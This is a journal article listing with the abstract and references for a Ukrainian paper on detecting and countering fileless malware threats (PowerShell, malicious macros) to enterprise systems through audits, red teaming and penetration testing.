Measures to counter threat to intelligent systems from fileless malware

DOI: 10.31673/2412-9070.2022.030311

Authors

  • Ю. І. Катков, (Katkov Yu. I.) State University of Telecommunications, Kyiv
  • О. В. Зінченко, (Zinchenko O. V.) State University of Telecommunications, Kyiv
  • С. С. Цибульник, (Tsybulʹnyk S. S.) State University of Telecommunications, Kyiv
  • Ю. О. Вітенко, (Vitenko Yu. O.) State University of Telecommunications, Kyiv

DOI:

https://doi.org/10.31673/2412-9070.2022.030311

Abstract

The article is devoted to the topical issue of finding means of countering threats to intelligent systems from fileless malware. The task: in order to timely localize and minimize possible damages from the impact of threats (vulnerabilities, attacks) from fileless malware on critical IT objects — the infrastructure of the enterprise’s intelligent systems, it is necessary to determine the best direction for the creation of methods for their timely detection. The article shows that the enterprise’s intellectual system has vulnerability and criticality from the weak influence of threats (vulnerabilities, attacks) of the attacker on critical objects of the IT infrastructure of the enterprise. As a result of this, the contradiction between the complexity of the methods of protecting objects of the critical IT infrastructure of the enterprise from malicious software, including fileless malware, and their effectiveness in terms of timely localization and minimizing possible damage from the influence of threats is exacerbated. But the resolution of this contradiction is possible due to the creation of flexible organizational structures for monitoring synergistic representations of the process of adaptation of the enterprise’s intelligent systems to threats from fileless malware. It is shown that, first of all, there is a need for constant improvement of the methods of detecting the impact of threats in the direction of their prediction. To do this, based on the analysis of the algorithm of the fileless malware through exploit sets, malicious Microsoft Word macros and compromised network equipment, a mechanism for influencing PowerShell of Windows, Unix. operating systems was determined. Actions to protect against fileless malware are proposed based on this mechanism. To implement these actions, it is shown how it is possible to search for macros, detect and confirm the presence of
fileless threats. It is proposed to apply the verification of information security of the enterprise using audit methods. The application of the Red Teaming hacker attack simulation methodology and penetration testing methods is proposed as the main audit method. Consider ways to use them.

Keywords: threat model; open source; fileless software; PowerShell.

References
1. Даник Ю. Г., Катков Ю. І., Пічугін М. Ф. Національна безпека: запобігання критичним ситуаціям: монографія. Житомир: Рута, 2006. 386 с.
2. Катков Ю. І. Методи, моделі та технології оцінки критичних ситуацій в інтелектуальній інформаційній інфраструктурі на основі когнітивних методів: дис. на здобуття наук. ступеня доктора техн. наук: [спец.] 05.13.06 «Інформаційні технології». Київ, 2021. 400 с.
3. Катков Ю. І. Аналіз причин критичних ситуацій в інформаційно-інтелектуальних системах // Зв’язок. 2018. №3(133). С. 12–19.
4. Діогенес Ю. Кібербезпека. Стратегії атак та оборони. Київ: Вид-во ДМК Пресс, 2016. 327 с.
5. OWASP. Application Threat Modeling [Електронний ресурс]. URL: https://owasp.org/wwwcommunity/Application_Threat_Modeling (дата звернення: 04.12.2022).
6. Agile Modeling. Security Threat Models: An Agile Introduction [Електронний ресурс]. URL: http://www.agilemodeling.com/artifacts/securityThreatModel.htm (дата звернення: 4.12.2022).
7. Guzman A., Gupta A. IoT Penetration Testing Cookbook: Identify Vulnerabilities and Secure your Smart Devices. Packt Publishing, 2017. Р. 34–35.
8. Shostack A. Threat Modeling: Designing for Security. Adam Shostack. Wiley, 2014. 624 p.
9. Versprite. Application Threat Modeling Helping Clients Learn & Build Risk-Based Threat Models [Електронний ресурс]. URL: https://versprite.com/security-offerings/appsec/application-threat-modeling/ (дата звернення: 10.12.2022).
10. Threatmodeler. Getting Started with Threat Modeling: How to Identify Your Mitigation Strategy [Електронний ресурс]. URL: https://threatmodeler.com/getting-started-withthreat-modeling-how-to-identify-your-mitigationstrategy/ (дата звернення: 10.12.2022).
11. Locking Down PowerShell to Foil Attackers: 3 Essentials [Електронний ресурс]. URL: https://www.databreachtoday.com/locking-downpowershell-to-foil-attackers-3-essentials-a-10662 / (дата звернення: 10.12.2022).
12. What is PowerShell? [Електронний ресурс]. URL: https://learn.microsoft.com/ru-ru/powershell/scripting/overview?view=powershell-7.3 (дата звернення: 10.12.2022).
13. PowerShell is a great attack vector for fileless threats More details? [Електронний ресурс]. URL: https://www.securitylab.ru/blog/company/PandaSecurityRus/345805.php (дата звернення 10.12.2022).
14. Barwise I. The Red Team Guide. Київ: Вид-во PEER-LYST, 2016. 241 с.
15. What is Red Teaming? Benefits & Methodology. Updated on: March 9, 2022 // [Електронний ресурс]. URL: https://www.getastra.com/blog/security-audit/red-team-methodology/#:~:text=Red%20Team%20Methodology%20gives%20a,system%20against%20a%20real%20cyberattack
16. Things Every Red Team Needs to Optimize Operations //[Електронний ресурс]. URL: https://www.netspi.com/resources/tip-sheets/5-things-every-red-team-needs-to-optimize-operations/
17. ISO 19011:2011. Настанови щодо проведення аудитів систем менеджменту. Чинний з 24-02-12. Київ: Міжнародна організація зі стандартизації, 2013. 45 с.

Downloads

Published

2023-04-12

Issue

No. 3 (2022)

Section

Articles